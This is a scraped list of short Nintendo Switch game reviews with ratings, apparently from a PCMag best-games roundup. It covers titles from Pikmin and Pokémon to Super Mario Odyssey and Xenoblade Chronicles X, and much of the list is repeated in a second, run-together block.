    The creators of Sonic Mania deliver a new indie 3D platformer that feels like a forgotten Sega classic. Use your trusty yo-yo to swing and roll through colorful, tightly designed levels that test your momentum control. Bosses and other enemies are sometimes more annoying than fun, but the movement mechanics are a joy to master.
    Penny's Big Breakaway review

    Pikmin 3 Deluxe

    3.5 Good

    Pikmin isn’t the most recognizable Nintendo franchise, but the approachable real-time strategy game carries as much magic as Mario and Zelda. This Wii U port offers more missions and ways to control your army of cute plant creatures. The campaign's local, co-op play opens all kinds of new strategies, too. Veterans of previous Pikmin wars may have seen most of this content before, but Pikmin newcomers should absolutely jump into this tiny, tactical, and tactile world.

    Pikmin 4

    4.5 Excellent

    Pikmin has always been good, but the quirky real-time strategy game has never broken out of its cult status over the past 20 years. Hopefully, that all changes with Pikmin 4. The biggest and best Pikmin game yet, Pikmin 4 gives you new Pikmin to command, a cute and customizable dog companion, and many gorgeous areas to strategically explore whether above ground or in countless caves. The multiplayer could be better, but Pikmin 4 is a top-tier Nintendo game everyone should play.
    Pikmin 4 review

    Pizza Tower

    Pizza Tower feels like a fever dream of 1990s cartoons, internet memes, and retro Wario Land games. Don’t let his pudgy exterior fool you. Protagonist Peppino Spaghetti has many incredibly fast and fluid platforming tools, including dashing and wall-running. You’ll need to master those tools to beat levels as fast as possible, without losing your mind.

    Pokemon Legends: Arceus

    3.5 Good

    Pokemon Legends: Arceus finally gives the Pokemon franchise a long-awaited refresh. Taking place in the distant past of Diamond and Pearl’s Sinnoh region, Arceus lets you capture and study wild Pokemon in a world where humans still fear the creatures. Vast open fields, revamped battle mechanics, and an utterly addictive approach to exploration create the most immersive Pokemon experience yet.

    Pokemon Let's Go, Pikachu/Eevee!

    Pokemon: Let's Go, Eevee!

    4.0 Excellent

    If the traditional Pokemon RPGs are still just a bit too complex for you, consider the casual adventures Pokemon Let's Go Pikachu and Let's Go Eevee. This duo remakes the first-generation Pokemon Yellow, with bright, colorful, HD graphics, and a new capture mechanic based on Pokemon Go. In addition, there are trainer battles and turn-based combat for people who dig classic Pokemon.

    Pokémon Scarlet and Violet

    Pokémon Scarlet - Nintendo Switch

    4.0 Excellent

    Pokemon Sword and Shield and Pokemon Legends: Arceus experimented with expansive zones, but Pokémon Scarlet and Violet finally turns the monster-catching game into an open-world RPG. As we always suspected, the addictive Pokémon formula works brilliantly when you can go wherever you want, exploring towns and catching whatever monsters you encounter. Lingering technical issues keep it from reaching its full potential, but this is Pokémon's shining future.

    Pokemon Sword/Shield

    4.0 Excellent

    Pokemon Let’s Go Pikachu and Eevee were a nice warmup, but Pokemon Sword and Shield are the real home console Pokemon games we’ve been looking forward to playing. Travel across big, open landscapes to capture even bigger Pokemon. New expansion packs in 2020 give trainers even more regions to explore and more Pokemon to battle without having to buy a third version. The Pokedex will be complete before you know it.

    Prince of Persia: The Lost Crown

    4.5 Excellent

    Prince of Persia returns to its 2D roots with The Lost Crown, a standout entry in the crowded modern Metroidvania market. Everything just clicks. The massive map is a joy to explore. Clever puzzles make the most of inventive abilities. Deep combat systems allow satisfying expression. Challenging DLC further expands the adventure. And the presentation combines Persian flair with anime exuberance.
    Prince of Persia: The Lost Crown review

    Pokemon Unite

    3.5 Good

    If you’re curious about the MOBA genre, but scared of esports heavy-hitters like Dota 2 and League of Legends, then Pokemon Unite is the perfect place to get started. Two teams of five Pokemon battle each other in real-time to score goals across the map. This free-to-play game is also coming soon to mobile, so you’ll find plenty of aspiring Pokemon masters to challenge.

    Puyo Puyo Tetris

    4.5 Excellent

    Practically everyone in North America has heard of Tetris. Far fewer have heard of Puyo Puyo. Both are block-dropping puzzle games, but while Tetris has been Tetris for decades, Puyo Puyo has had many different tweaks and name changes in attempts to appeal to the west. It came out first as Puyo Pop, then received different licensed incarnations, such as Puzzle Fighter and Dr. Robotnik's Mean Bean Machine. Now, Puyo Puyo is making its mark here, thanks to Sega and a double-billing with Tetris. The pairing results in a title that's plump with game modes, unlockables, and solo and multiplayer options.

    Red Dead Redemption

    Grand Theft Auto put Rockstar Games on the map, but for many the team's true masterpiece is the epic, open-world Western saga known as Red Dead Redemption. John Marston's cowboy odyssey has the scathing tone you'd expect from the developer, but it also has heart and a sense of tragedy. The Nintendo Switch version perfectly maintains the original gameplay experience, from stylish shootouts to riding your horse across the empty desert. It also includes the Undead Nightmare DLC. Finally, a version of Red Dead you can play in a tent under the stars.

    Rebel Galaxy Outlaw

    Rebel Galaxy Outlaw has enough action-packed, visually dazzling spaceship dogfights to excite any Star Fox fan. The real joy, however, is in the quieter moments, when you act out your galactic trucker fantasies by carrying cargo from space stations named after Texas towns. Improving your ship is a bit of a grind, but it’s a rewarding one. If you get bored, you can always shoot down pirates—or become one yourself.

    Rocket League

    Rocket League is soccer, with remote controlled cars and funny hats. It's amazing how compelling a game can be when the entire point of it is to use a car to knock a ball into a goal, but Rocket League nails it. Wild physics, colorful visuals, and simple game types you can keep coming back to while challenging friends and strangers make this one of the best pseudo-sports games on the Switch.

    Shovel Knight: Treasure Trove

    Platforming excellence comes to the Nintendo Switch courtesy of Yacht Club Games' Shovel Knight: Treasure Trove. This downloadable package includes the original Shovel Knight, one of 2014's top titles, as well as all the previously released DLC, including the Plague of Shadows and Specter of Torment campaigns. If you long for some retro, 2D action, Treasure Trove is a game that you should not miss.

    Splatoon 3

    4.0 Excellent

    Splatoon 3 isn't much different than Splatoon 2. However, no other online team-based shooter delivers an experience quite like this. Inking the ground, splatting opponents, and transforming from squid to kid never felt this good. The wealth of solo, cooperative, and competitive modes will keep you busy. Keep the party going with the excellent, roguelike DLC Side Order.
    Splatoon 3 review

    Street Fighter 30th Anniversary Collection

    Street Fighter has been the biggest name in fighting games for decades, and Capcom is proud of that fact. While it really got going with Street Fighter II: The World Warrior, the Street Fighter 30th Anniversary Collection lets you play the original Street Fighter in all of its genre-building glory. And, after you realize how bad that first attempt was, you can play the much better sequels like Super Street Fighter II, Street Fighter Alpha 3, and Street Fighter III: Third Strike. You're looking at a dozen games in this collection, with loads of extra content like soundtracks and sprite data.

    Streets of Rage 4

    Streets of Rage 4 pounds life back into the dead sidescrolling beat ‘em up genre. The gameplay may not have progressed that much since Sega’s trilogy in the 1990s, but taking down hordes of goons with your fists has never looked better thanks to a thoroughly modern illustrated art style. A risky new mechanic that burns health to power special moves, unless you avoid getting hit, adds some fighting-game flair.

    Super Bomberman R

    3.5 Good

    Bomberman's return to console gaming was one of the most surprising moments in Nintendo's January 2017 Switch game showcase. Considering that the little guy's now the property of Konami, a company that's more known for killing P.T. and warring with Metal Gear maestro Hideo Kojima than making video games, it was shocking to see Super Bomberman R announced as a Nintendo Switch launch title. Thankfully, this newest entry in the beloved, bomb-tossing franchise keeps the series' simple and addicting core gameplay intact, and adds tons of modes, collectible items, and characters to keep things fresh.

    Super Mario 3D All-Stars

    3.5 Good

    This classic Mario collection combines Super Mario 64, Super Mario Sunshine, and Super Mario Galaxy. They may not have received the radical visual overhaul of the original Super Mario All-Stars, but these are still three of the finest 3D platformers ever made—now playable in HD and on the go. Nintendo says this collection is a limited release, so get it while you can.

    Super Mario 3D World + Bowser's Fury

    4.5 Excellent

    Super Mario 3D World seamlessly blends the free-roaming, open-ended platforming of Mario’s 3D adventures with the concentrated multiplayer mayhem of his latest 2D romps. It was great on Wii U, and now it's even better on Nintendo Switch. However, this package’s real star is Bowser’s Fury, an ambitious spin-off that reimagines what an open-world Mario game can be.

    Super Mario Bros. Wonder

    Super Mario Bros. Wonder - Nintendo Switch

    4.5 Excellent

    In the beginning, all Super Mario games were wonderful 2D sidescrollers that dazzled us with their sheer imagination. But as Mario set his sights on 3D heights, the New Super Mario Bros. series turned 2D Mario into a safe and bland nostalgia franchise. No more! Super Mario Bros. Wonder fills 2D Mario to the brim with whimsy, creativity, and joyful confusion. Turn levels into psychedelic dreamscapes! Customize your abilities! Compete against friends online! Transform into an elephant! You can do all of this and more in Super Mario Bros. Wonder.
    Super Mario Bros. Wonder - Nintendo Switch review

    Super Mario Maker 2

    4.5 Excellent

    Super Mario Maker 2 is a welcome update to the original Super Mario Maker. It adds a new skin, new themes, and plenty of new tools for making more creative and challenging Mario levels. You can create levels based on the graphics and mechanics of Super Mario Bros., Super Mario Bros. 3, Super Mario World, and New Super Mario Bros., just like in the previous Super Mario Maker. These levels can use one of 10 different themes: Ground, Sky, Underground, Forest, Underwater, Ghost House, Desert, Airship, Snow, and Castle. Sky, Forest, Desert, and Snow are new to Super Mario Maker 2. For more variety, you can toggle each theme to its nighttime variant, which adds unique twists to the gameplay. And, of course, you can share your creations online.

    Super Mario Odyssey

    5.0 Outstanding

    In Super Mario Odyssey, the heroic plumber returns to open-world game design for the first time since the incredible Super Mario 64. Though Odyssey isn't as technically groundbreaking as its predecessor, the action-platformer is packed to the brim with hat-tossing combat. Yes, hat tossing. This time around, Mario has a new friend, Cappy, who lets Mario dispatch enemies with the flick of the wrist. And, even better, Mario can assume the identity of an enemy, gaining its abilities, by plopping Cappy on the foe's head.

    Super Mario RPG

    Super Mario RPG - Nintendo Switch, Nintendo Switch Lite, Nintendo Switch

    4.0 Excellent

    Forget Paper Mario or Mario and Luigi. The original Super Mario RPG, a collaboration between Nintendo and Square Enix, first showed us that Mario’s charms could translate to a Final Fantasy-style adventure. This faithful remake offers gorgeous new graphics and increased accessibility. At last, find out who Geno is.
    Super Mario RPG - Nintendo Switch, Nintendo Switch Lite, Nintendo Switch review

    Super Monkey Ball Banana Mania

    4.0 Excellent

    Only video games can capture the simple pleasures that come from racing monkeys inside balls. Super Monkey Ball Banana Mania remasters hundreds of classic stages from Sega’s obstacle course series in a single, cool package. Don’t let the bright colors and friendly monkey faces fool you. Rolling your monkey to the goal demands an expert understanding of the game’s unforgiving physics. If you get too frustrated, take a break with Banana Mania's wacky, multiplayer mini-games.

    Super Smash Bros. Ultimate

    4.5 Excellent

    Super Smash Bros. Ultimate has everything a fan of Nintendo’s crossover mascot fighting game could want. A faster pace better for competitive play. Every single character who has ever appeared in the series, including third-party icons such as Banjo-Kazooie, Cloud Strife, and Solid Snake. There's a new single-player mode chock-full of even more fan service. The theme song even has lyrics now. 

    Tactics Ogre: Reborn

    4.0 Excellent

    The original Tactics Ogre enthralled fans in 1995 thanks to its deep strategy and strong narrative. If you missed out the first time, Tactics Ogre: Reborn gives you another chance to check out this lost classic, the prelude to Final Fantasy Tactics. Just don’t expect hugely revamped graphics.

    Telling Lies

    Her Story was a test for the kind of interactive story game developer Sam Barlow could pull off with just FMV clips and a fake computer interface. Telling Lies is the Aliens to Her Story’s Alien. Instead of just investigating one woman’s interviews, you follow four different characters. Tracing a nonlinear mystery across so many different threads can get overwhelming. Fortunately, Hollywood actors Logan Marshall-Green, Alexandra Shipp, Kerry Bishé, and Angela Sarafyan make the clips compelling watches in their own right. Besides, we’re all pretty used to communicating through video chat these days.

    Triangle Strategy

    4.0 Excellent

    A tactical follow-up to the gorgeous Octopath Traveler, Triangle Strategy is a luxurious strategy role-playing game that rewards your patience. Soak in the atmosphere on the land. Become invested in the characters and political intrigue. Methodically think through every option during turn-based battles and feel like an absolute strategic genius. 

    Trombone Champ

    Rhythm games usually make you feel like an ultra-cool rock god. Not Trombone Champ. This zany title embraces the goofy charm of its titular instrument, delivering an experience that is both awesome and awkward. The purposefully bumbling controls make each song sound like a confused elephant putting on a concert, an effect that's multiplied in local multiplayer. A light progression system unlocks famous trombone players, like baseball cards, while you try to solve a sinister riddle. The game is also available on PC, but the Switch version deserves props for its hilarious motion controls that take the trombone simulation to the next level.

    Tokyo Mirage Sessions #FE Encore

    3.5 Good

    While you wait for Persona 5 to come to the Nintendo Switch, Tokyo Mirage Sessions #FE, a late Wii U port, is the next best thing. This bewildering crossover between Fire Emblem and Shin Megami Tensei has players entering the entertainment industry of Japan’s stylish Shibuya and Harajuku districts. Of course, you also do battle against demons by summoning Fire Emblem characters through the power of song. A streamlined battle system and pop music tone should delight players who don’t even care about anime RPGs. 

    Unicorn Overlord

    4.5 Excellent

    As a Vanillaware game, we’re not surprised that Unicorn Overlord has an unbelievably beautiful illustrated aesthetic. However, the game backs up its looks with deeply strategic role-playing gameplay that requires tactical thinking. Ogre Battle fans, this one’s for you.
    Unicorn Overlord review

    Void Bastards

    Roguelikes can be a polarizing genre as their repetitive nature, random elements, and punishing difficulty threaten to make the entire experience a waste of time. Void Bastards avoids this trap with a core gameplay loop that’s a joy to repeat and an addictive sense of progression stringing you along the whole time.

    Each new spaceship you raid is basically a tiny comic book-styled System Shock level with spooky enemies to shoot, machinery to hack, character traits to manage, and equipment to salvage. Use that equipment to construct permanent new weapons and perks that make you eager to start another raid. Our journey across the galaxy stretched on for hours because it’s so easy to say “just one more piece of loot.”

    Note that Void Bastards is published by Humble Bundle, which is owned by PCMag’s parent company, Ziff Davis.

    WarioWare: Get It Together

    4.0 Excellent

    WarioWare is one of Nintendo’s best and most shockingly self-aware franchises. It’s about Mario’s gross, evil doppelganger starting a shady game company to get rich. Fortunately for you, these “microgames” remain a pure blast of weird and wonderful bite-sized entertainment. The new gimmick here lets you and a friend tackle challenges with different characters whose unique move sets make you rethink your approach on the fly. Hurry up!

    Xenoblade Chronicles X: Definitive Edition

    4.0 Excellent

    This late-period Wii U gem finally returns to close out the Nintendo Switch era. A standalone entry of the Xenoblade saga, Xenoblade Chronicles X: Definitive Edition takes place on a lush open-world planet teeming with friendly and hostile creatures. Explore on foot or, eventually, by flying a giant mech. The dynamic RPG combat rewards smart timing and synchronizing party members. Along with improved visuals, this definitive edition adds a new epilogue story.
    Xenoblade Chronicles X: Definitive Edition review
    The Best Nintendo Switch Games for 2025
Capcom Fighting Collection: Arcade Classics lets you finally relive six legendary 2D fighters starring Marvel superheroes and Capcom icons. From the humble X-Men: Children of the Atom to the over-the-top Marvel vs. Capcom 2, this is vital fighting game history. An art gallery, modern control options, rollback netcode, and the underrated Punisher beat 'em up sweeten the deal. Marvel vs. Capcom Fighting Collection: Arcade Classics - Nintendo Switch review Metal Slug Tactics Metal Slug TacticsMetal Slug Tactics trades the mainline series' fast-paced running and gunning for methodical, turn-based strategy gameplay. Still, it's just as action-packed as ever. Line up your units for devastating sync attacks. Enjoy the beautiful old-school sprite work. Plan your turns, hop into a giant tank, and obliterate foes. Metroid Dread Metroid Dread4.5 Excellent After nearly 20 years, Metroid Dread brings Samus Aran back to her 2D, bounty hunting roots for the true Metroid 5. In it, you explore a dense, dangerous new planet full of powers to pick up and enemies to eliminate. From uncompromising boss battles to terrifying chases, Dread more than lives up to its subtitle. If there's anyone strong enough to take down the terror, it's Nintendo's leading lady. Metroid Prime Remastered 5.0 Outstanding Metroid Prime is one of the best games ever made. It takes Super Metroid’s brilliant exploratory action and perfectly translates it to 3D with immaculate level design and immersive first-person shooting. This remaster, which ventures into the remake territory, includes everything that worked in the original, and ups the presentation to modern, beautiful standards. Plus, you can now play with dual-stick controls. Bring on Metroid Prime 4. Metroid Prime Remastered review Miitopia Miitopia3.5 Good Miis can do more than just play Wii Sports. 
In Miitopia, you use Nintendo’s cartoon caricatures to cast yourself, friends, and family as heroes and villains in a fast-paced, whimsical role-playing game. Turn yourself into a brave knight, while your buddy supports you as a pop star. The joke can’t quite sustain the whole runtime, but Miitopia is wildly entertaining.   Monster Hunter Stories 2: Wings of Ruin Monster Hunter Stories 2: Wings of Ruin4.0 Excellent If traditional Monster Hunter is just too intense for you, Monster Hunter Stories 2 lets you experience this cutthroat world as a turn-based JRPG. Befriend monsters and take them into battle. Hatch eggs to expand your menagerie. Strategic battles draw upon familiar Monster Hunter concepts. And, of course, Rathalos is here. New Pokemon Snap New Pokemon Snap4.0 Excellent The beloved Nintendo 64 spin-off finally gets the update it deserves. Instead of capturing Pokemon and forcing them to battle, New Pokemon Snap asks you to take beautiful photos of Pikachu and friends in their natural surroundings. The on-rails gameplay feels like a nonviolent version of a light gun game. The gorgeous graphics will inspire you to share your best pics online for the world to see. Nickelodeon All-Star Brawl Nickelodeon All-Star Brawl4.0 Excellent Imagine Super Smash Bros., but instead of playing as video game mascots, you control beloved cartoon characters beating each other senseless. That's Nickelodeon All-Star Brawl. From SpongeBob SquarePants to Ren and Stimpy to the Teenage Mutant Ninja Turtles, the roster covers all eras of Nicktoon nostalgia. Beyond the ironic meme potential, "Nick Smash" features genuinely fantastic gameplay made by a team clearly passionate about this particular form of "platform fighting" games. Nickelodeon All-Star Brawlreview Nintendo Labo Toy-Con 01 Variety Kit Nintendo Labo Toy-Con 01 Variety Kit5.0 Outstanding Labo is a weirder concept than the Switch itself. 
It's based around building cardboard "Toy-Cons" in which you place the Switch's components to let you do new things with them. It's also surprisingly functional, entertaining, and educational. The Nintendo Labo Variety Kit has all of the parts you need to build several different Toy-Cons like a piano and motorcycle handlebars, and walks you through every step of the process. Just building the Toy-Cons is fascinating, but the Toy-Con Garage mode adds surprisingly robust programming options to let you create your own remote-controlled creations. Nintendo Labo: VR Kit 4.5 Excellent It took over 20 years, but Nintendo finally got over its fear of virtual reality after the disastrous Virtual Boy. The Labo VR Kit lets you build your own VR headset that uses the Nintendo Switch and a set of lenses to create a stereoscopic image, and then insert that headset into different Toy-Con controllers to play a variety of games. That's already a ton of fun for. Add a programming environment on top that lets you create your own 3D games, and you have an impressive package. No More Heroes III No More Heroes III4.0 Excellent No More Heroes III, like the other games in Suda51’s hack-and-slash trilogy, is a punk art game. Sure, some parts may be “bad,” like the technical jank or empty open worlds. But it’s all in service of larger commentary on everything from schlocky movies to wrestling fandom to the video game industry itself. Plus, cutting aliens down to size feels legitimately fantastic, and really that’s what matters.  Penny's Big Breakaway 4.0 Excellent The creators of Sonic Mania deliver a new indie 3D platformer that feels like a forgotten Sega classic. Use your trusty yo-yo to swing and roll through colorful, tightly designed levels that test your momentum control. Bosses and other enemies are sometimes more annoying than fun, but the movement mechanics are a joy to master. 
Penny's Big Breakaway review Pikmin 3 Deluxe Pikmin 3 Deluxe3.5 Good Pikmin isn’t the most recognizable Nintendo franchise, but the approachable real-time strategy game carries as much magic as Mario and Zelda. This Wii U port offers more missions and ways to control your army of cute plant creatures. The campaign's local, co-op play opens all kinds of new strategies, too. Veterans of previous Pikmin wars may have seen most of this content before, but Pikmin newcomers should absolutely jump into this tiny, tactical, and tactile world. Pikmin 4 Pikmin 44.5 Excellent Pikmin has always been good, but the quirky real-time strategy game has never broken out of its cult status over the past 20 years. Hopefully, that all changes with Pikmin 4. The biggest and best Pikmin game yet, Pikmin 4 gives you new Pikmin to command, a cute and customizable dog companion, and many gorgeous areas to strategically explore whether above ground or in countless caves. The multiplayer could be better, but Pikmin 4 is a top-tier Nintendo game everyone should play. Pikmin 4review Pizza Tower Pizza Tower feels like a fever dream of 1990s cartoons, internet memes, and retro Wario Land games. Don’t let his pudgy exterior fool you. Protagonist Peppino Spaghetti has many incredibly fast and fluid platforming tools, including dashing and wall-running. You’ll need to master those tools to beat levels as fast as possible, without losing your mind. Pokemon Legends: Arceus Pokemon Legends: Arceus3.5 Good Pokemon Legends: Arceus finally gives the Pokemon franchise a long-awaited refresh. Taking place in the distant past of Diamond and Pearl’s Sinnoh region, Arceus lets you capture and study wild Pokemon in a world where humans still fear the creatures. Vast open fields, revamped battle mechanics, and an utterly addictive approach to exploration create the most immersive Pokemon experience yet. Pokemon Let's Go, Pikachu/Eevee! Pokemon: Let's Go, Eevee! 
4.0 Excellent If the traditional Pokemon RPGs are still just a bit too complex for you, consider the casual adventures Pokemon Let's Go Pikachu and Let's Go Eevee. This duo remakes the first-generation Pokemon Yellow, with bright, colorful, HD graphics, and a new capture mechanic based on Pokemon Go. In addition, there are trainer battles and turn-based combat for people who dig classic Pokemon. Pokémon Scarlet and Violet Pokémon Scarlet - Nintendo Switch 4.0 Excellent Pokemon Sword and Shield and Pokemon Legends: Arceus experimented with expansive zones, but Pokémon Scarlet and Violet finally turns the monster-catching game into an open-world RPG. As we always suspected, the addictive Pokémon formula works brilliantly when you can go wherever you want, exploring towns and catching whatever monsters you encounter. Lingering technical issues keep it from reaching its full potential, but this is Pokémon's shining future. Pokemon Sword/Shield Pokemon Sword4.0 Excellent Pokemon Let’s Go Pikachu and Eevee were a nice warmup, but Pokemon Sword and Shield are the real home console Pokemon games we’ve been looking forward to playing. Travel across big, open landscapes to capture even bigger Pokemon. New expansions packs in 2020 give trainers even more regions to explore and more Pokemon to battle without having to buy a third version. The Pokedex will be complete before you know it.  Prince of Persia: The Lost Crown 4.5 Excellent Prince of Persia returns to its 2D roots with The Lost Crown, a standout entry in the crowded modern Metroidvania market. Everything just clicks. The massive map is a joy to explore. Clever puzzles make the most of inventive abilities. Deep combat systems allow satisfying expression. Challenging DLC further expands the adventure. And the presentation combines Persian flair with anime exuberance. 
Prince of Persia: The Lost Crown review Pokemon Unite Pokemon Unite3.5 Good If you’re curious about the MOBA genre, but scared of esports heavy-hitters like Dota 2 and League of Legends, then Pokemon Unite is the perfect place to get started. Two teams of five Pokemon battle each other in real-time to score goals across the map. This free-to-play game is also coming soon to mobile, so you’ll find plenty of aspiring Pokemon masters to challenge. Puyo Puyo Tetris Puyo Puyo Tetris4.5 Excellent Practically everyone in North America has heard of Tetris. Far fewer have heard of Puyo Puyo. Both are block-dropping puzzle games, but while Tetris has been Tetris for decades, Puyo Puyo has had many different tweaks and name changes in attempts to appeal to the west. It came out first as Puyo Pop, then received different licensed incarnations, such as Puzzle Fighter and Dr. Robotnik's Mean Bean Machine. Now, Puyo Puyo is making its mark here, thanks to Sega and a double-billing with Tetris. The pairing results in a title that's plump with game modes, unlockables, and solo and multiplayer options. Red Dead Redemption Red Dead RedemptionGrand Theft Auto put Rockstar Games on the map, but for many the team's true masterpiece is the epic, open-world Western saga known as Red Dead Redemption. John Marston's cowboy odyssey has the scathing tone you'd expect from the developer, but it also has heart and a sense of tragedy. The Nintendo Switch version perfectly maintains the original gameplay experience, from stylish shootouts to riding your horse across the empty desert. It also includes the Undead Nightmare DLC. Finally, a version of Red Dead you can play in a tent under the stars. Rebel Galaxy Outlaw Rebel Galaxy OutlawRebel Galaxy Outlaw has enough action-packed, visually dazzling spaceship dogfights to excite any Star Fox fan. 
The real joy, however, is in the quieter moments, when you act out your galactic trucker fantasies by carrying cargo from space stations named after Texas towns. Improving your ship is a bit of a grind, but it’s a rewarding one. If you get bored, you can always shoot down pirates—or become one yourself. Rocket League Rocket LeagueRocket League is soccer, with remote controlled cars and funny hats. It's amazing how compelling a game can be when the entire point of it is to use a car to knock a ball into a goal, but Rocket League nails it. Wild physics, colorful visuals, and simple game types you can keep coming back to while challenging friends and strangers make this one of the best pseudo-sports games on the Switch. Shovel Knight: Treasure Trove Shovel Knight: Treasure TrovePlatforming excellence comes to the Nintendo Switch courtesy of Yacht Club Games' Shovel Knight: Treasure Trove. This downloadable package includes the original Shovel Knight, one of 2014's top titles, as well as all the previously released DLC including the Plague of Shadows and Specter of Torment campaigns. If you long for some retro, 2D action, Treasure Trove a a game that you should not miss. Splatoon 3 Splatoon 34.0 Excellent Splatoon 3 isn't much different than Splatoon 2. However, no other online team-based shooter delivers an experience quite like this. Inking the ground, splatting opponents, and transforming from squid to kid never felt this good. The wealth of solo, cooperative, and competitive modes will keep you busy. Keep the party going with the excellent, roguelike DLC Side Order. Splatoon 3review Street Fighter 30th Anniversary Collection Street Fighter 30th Anniversary CollectionStreet Fighter has been the biggest name in fighting games for decades, and Capcom is proud of that fact. While it really got going with Street Fighter II: The World Warrior, the Street Fighter 30th Anniversary Collection lets you play the original Street Fighter in all of its genre-building glory. 
And, after you realize how bad that first attempt was, you can play the much better sequels like Super Street Fighter II, Street Fighter Alpha 3, and Street Fighter III: Third Strike. You're looking at a dozen games in this collection, with loads of extra content like soundtracks and sprite data. Streets of Rage 4 Streets of Rage 4Streets of Rage 4 pounds life back into the dead sidescrolling beat ‘em up genre. The gameplay may not have progressed that much since Sega’s trilogy in the 1990s, but taking down hordes of goons with your fists has never looked better thanks to a thoroughly modern illustrated art style. A risky new mechanic that burns health to power special moves, unless you avoid getting hit, adds some fighting-game flair.  Super Bomberman R Super Bomberman R3.5 Good Bomberman's return to console gaming was one of the most surprising moments in the Nintendo's January 2017 Switch game showcase. Considering that the little guy's now the property of Konami, a company that's more known for killing P.T. and warring with Metal Gear maestro Hideo Kojima than making video games, it was shocking to see Super Bomberman R announced as a Nintendo Switch launch title. Thankfully, this newest entry in the beloved, bomb-tossing franchise keeps the series' simple and addicting core gameplay intact, and adds tons of modes, collectible items, and characters to keep things fresh. Super Mario 3D All-Stars Super Mario 3D All-Stars3.5 Good This classic Mario collection combines Super Mario 64, Super Mario Sunshine, and Super Mario Galaxy. They may not have received the radical visual overhaul of the original Super Mario All-Stars, but these are still three of the finest 3D platformers ever made—now playable in HD and on the go. Nintendo says this collection is a limited release, so get it while you can. 
Super Mario 3D World + Bowser's Fury Super Mario 3D World + Bowser's Fury4.5 Excellent Super Mario 3D World seamlessly blends the free-roaming, open-ended platforming of Mario 3D’s adventures with the concentrated multiplayer mayhem of his latest 2D romps. It was great on Wii U, and now it's even better on Nintendo Switch. However, this package’s real star is Bowser’s Fury, an ambitious spin-off that reimagines what an open-world Mario game can be. Super Mario Bros. Wonder Super Mario Bros. Wonder - Nintendo Switch 4.5 Excellent In the beginning, all Super Mario games were wonderful 2D sidescrollers that dazzled us with their sheer imagination. But as Mario set his sights on 3D heights, the New Super Mario Bros. series turned 2D Mario into a safe and bland nostalgia franchise. No more! Super Mario Bros. Wonder fills 2D Mario to the brim with whimsy, creativity, and joyful confusion. Turn levels into psychedelic dreamscapes! Customize your abilities! Compete against friends online! Transform into an elephant! You can do all of this and more in Super Mario Bros. Wonder. Super Mario Bros. Wonder - Nintendo Switch review Super Mario Maker 2 Super Mario Maker 24.5 Excellent Super Mario Maker 2 is a welcome update to the original Super Mario Maker. It adds a new skin, new themes, and plenty of new tools for making more creative and challenging Mario levels. You can create levels based on the graphics and mechanics of Super Mario Bros., Super Mario Bros. 3, Super Mario World, and New Super Mario Bros., just like in the previous Super Mario Maker. These levels can use one of 10 different themes: Ground, Sky, Underground, Forest, Underwater, Ghost House, Desert, Airship, Snow, and Castle. Sky, Forest, Desert, and Snow are new to Super Mario Maker 2. For more variety, you can toggle each theme to its nighttime variant, which adds unique twists to the gameplay. And, of course, you can share your creations online. 
Super Mario Odyssey Super Mario Odyssey5.0 Outstanding In Super Mario Odyssey, the heroic plumber returns to open-world game design for the first time since the incredible Super Mario 64. Though Odyssey isn't as technically groundbreaking as its predecessor, the action-platformer is packed to the brim with hat-tossing combat. Yes, hat tossing. This time around, Mario has a new friend, Cappy, who lets Mario dispatch enemies with the flick of the wrist. And, even better, Mario can assume the identity of an enemy, gaining its abilities, by plopping Cappy on the foe's head. Super Mario RPG Super Mario RPG - Nintendo Switch, Nintendo Switch Lite, Nintendo Switch 4.0 Excellent Forget Paper Mario or Mario and Luigi. The original Super Mario RPG, a collaboration between Nintendo and Square Enix, first showed us that Mario’s charms could translate to a Final Fantasy-style adventure. This faithful remake offers gorgeous new graphics and increased accessibility. At last, find out who Geno is. Super Mario RPG - Nintendo Switch, Nintendo Switch Lite, Nintendo Switch review Super Monkey Ball Banana Mania Super Monkey Ball Banana Mania4.0 Excellent Only video games can capture the simple pleasures that come from racing monkeys inside balls. Super Monkey Ball Banana Mania remasters hundreds of classic stages from Sega’s obstacle course series in a single, cool package. Don’t let the bright colors and friendly monkey faces fool you. Rolling your monkey to the goal demands an expert understanding of the game’s unforgiving physics. If you get too frustrated, take a break with Banana Mania's wacky, multiplayer mini-games. Super Smash Bros. Ultimate Super Smash Bros. Ultimate4.5 Excellent Super Smash Bros. Ultimate has everything a fan of Nintendo’s crossover mascot fighting game could want. A faster pace better for competitive play. Every single character who has ever appeared in the series, including third-party icons such as Banjo-Kazooie, Cloud Strife, and Solid Snake. 
There's a new single-player mode chock-full of even more fan service. The theme song even has lyrics now.  Tactics Ogre: Reborn Tactics Ogre Reborn4.0 Excellent The original Tactics Ogre enthralled fans in 1995 thanks to its deep strategy and strong narrative. If you missed out the first time, Tactics Ogre: Reborn gives you another chance to check out this lost classic, the prelude to Final Fantasy Tactics. Just don’t expect hugely revamped graphics. Telling Lies Telling LiesHer Story was a test for the kind of interactive story game developer Sam Barlow could pull off with just FMV clips and a fake computer interface. Telling Lies is the Aliens to Her Story’s Alien. Instead of just investigating one woman’s interviews, you follow four different characters. Tracing a nonlinear mystery across so many different threads can get overwhelming. Fortunately, Hollywood actors Logan Marshall-Green, Alexandra Shipp, Kerry Bishé, and Angela Sarafyan make the clips compelling watches in their own right. Besides, we’re all pretty used at communicating through video chat these days.  Triangle Strategy Triangle Strategy4.0 Excellent A tactical follow-up to the gorgeous Octopath Traveler, Triangle Strategy is a luxurious strategy role-playing game that rewards your patience. Soak in the atmosphere on the land. Become invested in the characters and political intrigue. Methodically think through every option during turn-based battles and feel like an absolute strategic genius.  Trombone Champ Trombone ChampRhythm games usually make you feel like an ultra-cool rock god. Not Trombone Champ. This zany title embraces the goofy charm of its titular instrument, delivering an experience that is both awesome and awkward. The purposefully bumbling controls make each song sound like a confused elephant putting on a concert, an effect that's multiplied in local multiplayer. A light progression system unlocks famous trombone players like baseball cards while trying to solve a sinister riddle. 
